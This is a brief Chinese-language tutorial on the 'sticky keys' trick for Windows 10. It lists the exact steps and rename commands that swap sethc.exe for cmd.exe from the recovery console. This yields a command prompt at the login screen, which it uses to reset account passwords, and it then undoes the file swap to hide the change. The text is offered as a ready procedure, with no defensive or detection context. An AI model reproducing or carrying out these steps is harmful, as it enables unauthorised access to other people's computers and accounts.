Window10沾滞键漏洞

概述

利用高级选项中的命令提示符，去修改粘滞键程序，调出CMD命令提示符，直接修改账户密码

操作

• 在出现window图标时，重启计算机(一般2次)，会进入修复页面

• 利用高级选项中的命令提示符，去修改粘滞键程序

  

• 输入命令实现盘符切换到C盘

1. X:\windows\system32>cd /d c:

• 输入dir命令查看c盘下文件

• 更改沾滞键和命令行程序文件名

1. rename windows\system32\sethc.exe sethc1.exe
2. rename windows\system32\cmd.exe sethc.exe

• 正常重新启动计算机，按5次shift键会直接跳出cmd，使用命令修改密码

  

• 重复之前重启步骤，将沾滞键和命令行程序文件名还原

1. cd /d c:
2. rename windows\system32\sethc.exe cmd.exe
3. rename windows\system32\sethc1.exe sethc.exe